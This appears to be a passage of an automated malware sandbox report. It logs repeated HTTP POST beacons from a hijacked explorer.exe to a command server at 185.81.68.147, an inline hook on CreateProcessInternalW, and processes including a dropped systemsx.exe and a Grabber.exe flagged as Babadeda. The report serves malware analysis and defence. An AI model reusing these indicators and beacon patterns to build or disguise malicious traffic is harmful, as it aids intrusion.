User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:17.073338032 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:18.567558050 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:17 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.5 | 49885 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:18.800961971 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:18.922790051 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:20.256155968 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:19 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.5 | 49891 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:20.484791040 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:20.604718924 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:22.121589899 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:21 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.5 | 49897 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:22.343995094 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:22.463862896 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:23.963820934 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:23 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.5 | 49898 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:24.187975883 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:24.307919025 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:25.619158983 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:24 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.5 | 49904 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:25.844650030 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:25.964493990 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:27.460812092 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:26 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.5 | 49905 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:27.688188076 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:27.808394909 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:29.326906919 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:28 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.5 | 49911 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:29.562988043 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:29.682809114 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:31.009622097 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:30 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.5 | 49917 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:31.234860897 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:31.355340004 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:32.905642033 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:31 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.5 | 49923 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:33.141158104 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:33.261368036 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:34.599256992 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:33 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.5 | 49924 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:34.831712008 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:34.951719999 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:36.432595968 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:35 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.5 | 49930 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:36.656960964 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:36.853092909 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:38.294503927 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:37 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.5 | 49936 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:38.531939983 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:38.651813984 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:40.155792952 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:39 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 49937 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:40.391685963 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:40.511718035 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:41.897562981 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:41 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 49943 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:42.125504971 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:42.245377064 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:43.557998896 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:42 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 49949 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:43.781451941 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:43.901422024 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:45.221307993 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:44 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 49951 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:45.454060078 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:45.574320078 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:46.937748909 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:46 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 49956 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:47.172399044 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:47.292593956 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:48.603566885 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:47 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
55          192.168.2.5  49960        185.81.68.147   80                1028  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 09:13:48.830661058 CET  277                OUT        POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:48.950720072 CET  6                  OUT        Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:50.454200983 CET  216                IN         HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:49 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
56          192.168.2.5  49965        185.81.68.147   80                1028  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 09:13:50.687758923 CET  277                OUT        POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:50.807625055 CET  6                  OUT        Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:52.135210037 CET  216                IN         HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:51 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
57          192.168.2.5  49970        185.81.68.147   80                1028  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 09:13:52.359910011 CET  277                OUT        POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:52.479888916 CET  6                  OUT        Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:53.978038073 CET  216                IN         HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:53 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
58          192.168.2.5  49975        185.81.68.147   80                1028  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 09:13:54.204077005 CET  277                OUT        POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:54.324280977 CET  6                  OUT        Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:55.660036087 CET  216                IN         HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:54 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
59          192.168.2.5  49978        185.81.68.147   80                1028  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 09:13:55.890947104 CET  277                OUT        POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:56.010875940 CET  6                  OUT        Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:57.339330912 CET  216                IN         HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:56 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
60          192.168.2.5  49983        185.81.68.147   80                1028  C:\Windows\explorer.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 15, 2024 09:13:57.757472038 CET  277                OUT        POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:57.877573967 CET  6                  OUT        Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:13:59.196631908 CET  216                IN         HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:13:58 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
61 | 192.168.2.5 | 49989 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:13:59.422288895 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:13:59.542449951 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:14:01.251880884 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:14:00 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.5 | 49995 | 185.81.68.147 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Dec 15, 2024 09:14:01.486850977 CET | 277 | OUT | POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1
Host: 185.81.68.147
Pragma: no-cache
Content-type: text/html
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
Content-Length: 4
Dec 15, 2024 09:14:01.610707045 CET | 6 | OUT | Data Raw: 48 5f 5e 57
Data Ascii: H_^W
Dec 15, 2024 09:14:03.092776060 CET | 216 | IN | HTTP/1.1 200 OK
Date: Sun, 15 Dec 2024 16:14:02 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
X-Powered-By: PHP/8.2.12
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                        Code Manipulations

Function Name | Hook Type | Active in Processes
CreateProcessInternalW | INLINE | explorer.exe

Function Name | Hook Type | New Data
CreateProcessInternalW | INLINE | 0xE9 0x90 0x00 0x07 0x75 0x5F

                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                        Start time:03:11:56
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\K6qneGSDSB.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\K6qneGSDSB.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff79cd60000
                                                                                                                                                                                                                        File size:2'672'128 bytes
                                                                                                                                                                                                                        MD5 hash:52C82F6CEB8CF41DE8A4C01B313E3712
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:1
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\AppData\Roaming\systemsx.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\systemsx.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff794830000
                                                                                                                                                                                                                        File size:307'712 bytes
                                                                                                                                                                                                                        MD5 hash:1BBC3BFF13812C25D47CD84BCA3DA2DC
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 75%, ReversingLabs
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\Grabber.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:"Grabber.exe"
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        File size:2'000'000 bytes
                                                                                                                                                                                                                        MD5 hash:7BCE43CC96CC747B5909B5FA404C7FFE
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                        • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\Desktop\Grabber.exe, Author: Joe Security
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 46%, ReversingLabs
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                        Start time:03:11:57
                                                                                                                                                                                                                        Start date:15/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                        Imagebase:0x7ff775ae0000
                                                                                                                                                                                                                        File size:69'632 bytes
                                                                                                                                                                                                                        MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
